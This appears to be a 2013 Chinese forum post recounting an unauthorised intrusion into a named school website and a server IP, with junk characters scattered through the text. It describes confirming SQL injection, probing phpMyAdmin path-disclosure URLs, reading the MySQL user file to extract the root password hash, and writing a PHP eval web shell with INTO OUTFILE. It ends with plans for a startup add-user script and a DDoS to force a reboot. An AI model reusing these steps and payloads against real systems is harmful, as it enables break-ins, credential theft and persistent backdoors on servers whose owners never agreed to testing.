第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏0 }" g) [6 T; p
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
0 m% m+ n* Q3 r' `, W( Z* {0 x% T) @: e, a- X; n
" \0 _2 V' X5 {7 K' H; N$ i* s5 f
+ h" a* F* O4 j/ D3 \! T. C
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
9 h E# \; _% E3 m6 R' O0 _) V' I0 i8 v3 I0 L+ v7 A4 b) J- p+ A
那么想可以直接写入shell ,getshell有几个条件:9 Q: R" p+ }6 f/ T$ N9 Z/ L7 n
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF / k t4 o- o3 ]& L+ _2 M! j. ~
- V1 Q H* t8 G% {' @/ }5 `* o试着爆绝对路径: + n2 T( T8 l7 w" F! j
1./phpMyAdmin/index.php?lang[]=1 ! g ^' F. J) l8 T. Q( f" \$ [
2./phpMyAdmin/phpinfo.php 3 A9 [ o% B% p* H4 @
3./load_file() 3 x/ I9 Y' B8 |+ m$ M8 W9 ]3 q' ?
4./phpmyadmin/themes/darkblue_orange/layout.inc.php ; n; J; j1 d2 o2 N7 i
5./phpmyadmin/libraries/select_lang.lib.php & V& B+ O6 N) X( e# z0 b
6./phpmyadmin/libraries/lect_lang.lib.php - m7 e8 i' }6 }; Y
7./phpmyadmin/libraries/mcrypt.lib.php
' ^2 {3 A! h" W0 |6 {8 L8./phpmyadmin/libraries/export/xls.php
$ f% [9 C! V h0 r; {
7 p" I# k) K# K" |- c均不行...........................
4 f, j3 x; c- N, S8 Q- S# N* h% ~ S, ]1 S! o
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php & f. \! Y1 j0 J6 b. L! p
, }1 r& V q9 I7 D7 V权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 F W* Q( B2 `3 S5 v& s' g
6 O/ H0 T3 M& F5 b0 P
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 & k) b1 S5 U! m9 ~3 e
9 z0 x1 m* ?1 [0 }敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
, t- C$ z& Q/ J' @/ z5 h) \) P3 `: F: c* j7 d" S
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 9 E' X2 q$ f/ C8 `1 f. l
9 A( f' T7 l9 c, J0 r3 Nhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 1 [7 I0 ?* k0 h) ]) m" z0 ^ V
+ F# ]6 t1 z" D0 K j自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
* ]* y: g) r# ~# g% O# {
: v e; E y L* {) ?) b成功读到root密码: 6 P. K' ?( F* B2 a1 k& T9 H+ v
6 n/ c. L/ H! ~& [3 M
17---- r(0072) 4 N3 ~7 G2 ~: a8 O7 d
18---- o(006f) ' m+ p# s5 G! K7 y$ Q- w$ j" r, R0 h
19---- o(006f) % U1 Y! z% s9 K! ^/ q1 @ @4 C0 K' b
20---- t(0074)
9 J/ c' O$ N _. O @21---- *(002a) : z' i! i3 F2 `) d3 U. j# e
22---- 8(0038) # h, C2 X) [% s5 P. c, s
23---- 2(0032) 3 n* O) q* z, K# G' b3 d& p
24---- E(0045)
; F+ {' W6 c+ e& C0 k25---- 1(0031)
* k! T8 U0 j3 `' C26---- C(0043) 3 c% Y6 x; {7 `. R0 d( u L- c; G
27---- 5(0035)
/ p# ]5 {9 @3 N; [) i1 d# O28---- 8(0038)
4 C6 i2 \! c: j3 l d29---- 2(0032)
- @9 k2 S. O9 @/ | L6 z1 E30---- 8(0038)
' k: H. A' A0 N$ L' {31---- A(0041) . ^. J }- Z4 Z8 J; `$ u/ i
32---- 9(0039)
7 _" e6 w W- H33---- B(0042)
c- F- K7 M# t0 ^34---- 5(0035) 8 L6 A' l. H& u' b* ]
35---- 4(0034)
4 l* i- ^) C2 _' f$ h- Y3 t- T36---- 8(0038)
2 |! r9 {' J$ G$ G$ }37---- 6(0036)
9 ~: L6 E2 Q' A9 G0 J' u6 a2 F+ }6 B38---- 4(0034) ' f- q% C q8 B- G
39---- 9(0039)
- s2 L2 Y8 `3 ~3 ]0 N40---- 1(0031) . R- _+ m' {' w8 d4 y4 c6 w
41---- 1(0031) % l0 t( _' l3 k/ h2 A' r$ F
42---- 5(0035)
8 E0 P% ^$ k9 P% g* \! ~43---- 3(0033)
, q% K' y8 L3 U5 U6 h* a44---- 5(0035)
" j) h6 i4 i9 J5 B4 P45---- 9(0039)
# Z7 ]' ?( E, _6 q0 b7 b. ?46---- 8(0038)
2 F8 b* H$ W& s9 ~4 G1 L1 I47---- F(0046) $ G$ a' A2 \+ J# O
48---- F(0046) 2 ?/ J* C! K+ G' K# `; x
49---- 4(0034) + u8 y& u5 r/ N6 l* o; g2 f
50---- F(0046) 3 t1 C2 l6 }$ \+ k( J6 l) S
51---- 0(0030) 6 q2 {; f1 U, h6 r
52---- 3(0033) " C% H% i9 ], _
53---- 2(0032)
: s0 W2 [" _1 ]# f# X! L54---- A(0041)
5 O w" |. H. R3 Y0 | u) t9 n9 v55---- 4(0034)
3 [) ~/ H1 P5 i% B5 L; H5 P! f56---- A(0041)
- [' P$ b5 e# x. C57---- B(0042)
# j6 } ]4 ?& ?# J& v58---- *(0044)
# {$ E" x( s; e/ f g6 J, ]59---- *(0035)
5 I! ~. x; [. l y/ S) |9 _9 T60---- *(0041) 7 F4 i% B) g# z3 b% n: ~$ a
61---- *0032) 5 _/ J1 H, h' u5 X
; y; U1 p( q( y8 k
解密后成功登陆phpmyamin
8 \6 m3 L3 W' b A, m
) i0 ]. }% l, s# S* h
1 i% b3 h. E0 X( D0 X$ b 9 I; i& \) i; x6 v; C1 o
' @" h1 s4 F$ H4 |
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
1 N4 M W: A7 d0 q$ z. [- {% @: f, Y! e1 M0 k9 V i
成功执行,拿下shell,菜刀连接:
4 c0 T; F7 S. q' d3 t- ]& n p; D S: q" n
服务器不支持asp,aspx,php提权无果................... / ]- i8 x$ V& d
' b# o2 T4 R# c* {; }( a I2 ]但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
2 D& o; Z7 m9 Q1 q服务器上已经有个隐藏帐号了
! }% m& _. K7 J2 t8 `别名 administrators
6 I6 `6 `- Y% g7 ]注释 管理员对计算机/域有不受限制的完全访问权
' n* {' U. Z& A5 v0 P; x2 u成员
- g: Y `6 d% y" l7 t-------------------------------------------------------------------------------
* v6 z+ E' v$ U! c. [admin# D4 [! v9 M3 I' `4 b
Administrator, `3 n) n/ n+ g. S' v
slipper$6 _8 r# f0 m+ v9 A7 c# R* f
sqluser- C6 A" h: |- A1 h: u4 z/ Y. R7 g
命令成功完成。 ) R% _- ^7 M8 ]; u3 t# }
/ C' o7 S9 X9 z1 U/ r: g/ T- h
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
+ i& Y, N: P/ o2 f1 ^9 g! P- ~- F8 ?" p9 [1 h1 L2 s! F
ddos服务器重启,不然就只能坐等服务器重启了...............................; S7 F: P! T O5 U
. m0 l0 t! m# K0 g a% J& M, c, f
* k& N" `* w7 n- K; m! E
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
